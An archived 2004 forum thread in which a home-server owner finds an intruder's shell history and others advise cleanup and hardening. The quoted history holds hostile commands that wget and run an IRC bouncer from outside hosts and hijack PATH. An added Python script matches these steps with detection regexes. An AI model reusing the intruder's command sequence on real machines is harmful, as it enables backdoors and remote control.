
This is the static archive of the Massassi Forums. The forums are closed indefinitely. Thanks for all the memories!

Have I been hacked?
2004-01-29, 8:20 AM #1
Well, I set up a Redhat 9 machine here at my house to run an FTP server for me to get to my files from wherever. It's not in a great place to sit and use it, so if I need to do anything I usually SSH into it from my desktop with PuTTY. Well, I go on there today and wanted to remember a command I typed a little while back, so I press up a few times and there's all this stuff I never did. Here's what was there:

w
export PATH="."
sh
w
cd /tmp
wget earth.prohosting.com/xc3te/up/psy.tgz
tar xzvf psy.tgz
cd psybnc
mv psybnc sh
bash
ls
cxd /tmp
cd /tmp
wget www.clauduma.com/lol/bnc.tar.gz
tar zxvf bnc.tar.gz
cd .bash
./psybnc
cd /tmp
ls
cd psybnc
ls -a
pco psybnc.conf
get www.silco.go.ro/work.tgz
tar -zxvf work.tgz
rm -rf work.tgz
cd work
rm -rf mech.set
wget www.silco.go.ro/mech.set

And it goes on and on...

I'm beginning to think with Windows this wouldn't have happened.


------------------
http://www.sporkaudio.com
gbk is 50 probably

MB IS FAT
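As an added example (not from the thread or any poster), here is a small defender-side triage script that runs a few heuristics over a constructed history sample shaped like the one quoted above: it flags the PATH hijack, archive downloads, IRC-bouncer names and the renaming of psybnc to sh, and lists the download hosts so they can be looked up in firewall or proxy logs.

```python
import re

# Constructed sample in the shape of the history quoted in the post (not the real file).
SAMPLE_HISTORY = """w
export PATH="."
sh
cd /tmp
wget earth.prohosting.com/xc3te/up/psy.tgz
tar xzvf psy.tgz
cd psybnc
mv psybnc sh
ls -a
wget www.silco.go.ro/mech.set
"""

# Heuristic rules: (name, regex). Each is a pattern seen in the quoted history.
RULES = [
    # PATH set to "." so a dropped binary shadows real commands
    ("path_hijack", re.compile(r'^\s*export\s+PATH=["\']?\.(?::|["\']|$)')),
    # fetching tarballs / config blobs from the network
    ("fetch_archive", re.compile(r'^\s*(wget|curl)\s+\S+\.(tgz|tar\.gz|tar|set)\b')),
    # unpacking an archive (usually right after the fetch)
    ("unpack_archive", re.compile(r'^\s*tar\s+-?[xz]+')),
    # well-known IRC bouncer / bot names
    ("irc_bouncer", re.compile(r'\b(psybnc|eggdrop|mech)\b', re.I)),
    # renaming a dropped binary to look like a system tool
    ("binary_rename", re.compile(r'^\s*mv\s+\S+\s+(sh|bash|ls|ps|netstat)\s*$')),
]

HOST_RX = re.compile(r'^\s*(?:wget|curl)\s+(?:https?://)?([^/\s]+)')


def triage_history(text):
    """Return (line_no, rule_name, command) for every rule that matches a line."""
    hits = []
    for no, line in enumerate(text.splitlines(), start=1):
        for name, rx in RULES:
            if rx.search(line):
                hits.append((no, name, line))
    return hits


def summarize(text):
    """Count hits per rule so a box can be triaged at a glance."""
    counts = {name: 0 for name, _ in RULES}
    for _, name, _ in triage_history(text):
        counts[name] += 1
    return counts


def download_sources(text):
    """Sorted list of hosts that files were fetched from (for log correlation)."""
    return sorted({m.group(1) for line in text.splitlines() if (m := HOST_RX.match(line))})


if __name__ == "__main__":
    for no, name, cmd in triage_history(SAMPLE_HISTORY):
        print(f"line {no:3d} [{name}] {cmd}")
    print(summarize(SAMPLE_HISTORY))
    print("download hosts:", download_sources(SAMPLE_HISTORY))
```

A history file can be wiped or edited by whoever got in, so hits here are a starting point for a wipe-and-rebuild decision, not proof that nothing else happened.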
2004-01-29, 8:24 AM #2
Linux hacked? IMPOSSIBLE! [/sarcasm]

------------------
Massassian since: March 12, 2001

[=-"The hardest thing is to forgive, but God does;
Even if you murdered or robbed, years wrong, but God loves;
Take one step toward him, he takes two toward you;
Even when all else fail, God supports you." - Nas
-=]
Got a permanent feather in my cap;
Got a stretch to my stride;
a stroll to my step;
2004-01-29, 8:26 AM #3
Did you try visiting those URLs to see what they might be....??

Maybe not the best advice.. but it's a start.

Not to state the obvious or anything, but from the looks of it, it looks like someone logged onto your FTP and started doing commands. One thing to suggest would be to remove the files that it got from those URLs (the tars, etc. etc.)... maybe back up your stuff and re-format and reinstall Redhat?

------------------
Fragment Thoughts consume my vision.

[This message has been edited by fragment (edited January 29, 2004).]
No-one knows what it's like to be the bad man,
to be the sad man Behind Blue Eyes.

- The Who
2004-01-29, 8:30 AM #4
Well the problem is I'm working on a deal to sell an audio engine I wrote, the backups of all the source are on this server. It would be very very bad for me if this source got out.

I'm not good enough with Linux to know what this person did; all I can think of is maybe BNC is a variant of VNC. Which is just great... ERRRR.......

By the way, this angers me greatly.

------------------
http://www.sporkaudio.com
gbk is 50 probably

MB IS FAT
2004-01-29, 8:35 AM #5
A quick Google Groups search turned up http://groups.google.com/groups?num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&q=psy.tgz&btnG=Google+Search

I'd suggest wiping and reinstalling. And... well... tighten up your security.

------------------
The future is here, and all bets are off.

[This message has been edited by GBK (edited January 29, 2004).]
And when the moment is right, I'm gonna fly a kite.
2004-01-29, 8:53 AM #6
Thanks GBK, turns out whatever they loaded will give them shell access to my machine from an IRC channel. Great. Doesn't surprise me though, as I used the same password for root as I did my FTP user name. I guess I'll just wipe it out and start fresh. Any suggestions on keeping this from happening again? Also, is there a way I can find the IP of whoever did this? Maybe I can get their ISP to do something...

------------------
http://www.sporkaudio.com
gbk is 50 probably

MB IS FAT
2004-01-29, 9:10 AM #7
A few suggestions...


1) Download chkrootkit. Run it religiously.

2) Make your root password long, unique, and never transmit it over the clear. (Always use SSH, never telnet)

3) Get a good firewall. Either a linux box running Smoothwall, or a real, honest-to-goodness hardware firewall.

4) Shut down every service you're not using. I'm serious. Anything you don't need, shut it off. The less you're running, the more secure you'll be.

5) Don't use RedHat. Use something like Trustix (designed for security) or OpenBSD (only one remote hole in the default install, in more than 7 years!). I too run RedHat on my server, and I'm definitely gonna wipe and install one of the aforementioned... once I get around to it...


6) Change your password weekly. Or daily. Heck, rig a Perl script that changes it to a random 256-char-long string every 2 seconds... ;)

7) At the firewall, block off every bleeding thing except FTP and SSH.

8) Don't give out your server's IP to just anyone. Remember, trust no one.... ;)


..Ok, so the last 3 were something of a stretch... :o

------------------
The future is here, and all bets are off.
And when the moment is right, I'm gonna fly a kite.
2004-01-29, 9:36 AM #8
Downloading trustix now... Thanks again GBK.

------------------
http://www.sporkaudio.com
gbk is 50 probably

MB IS FAT
2004-01-29, 1:25 PM #9
One thing with that unique password thing: make the password letters AND NUMBERS, it's a hell of a lot better that way.

------------------
Madquack and Firbnic have a signature.
*Remnant Temple beta almost done*
Light And Darkness
I was just petting the bunny, and it went into the soup can, and part of my hand went with it. - Red vs Blue
2004-01-29, 2:27 PM #10
Don't put your source code on a machine that is connected to the net, if you can help it.

------------------
[This message has been edited. Deal with it.]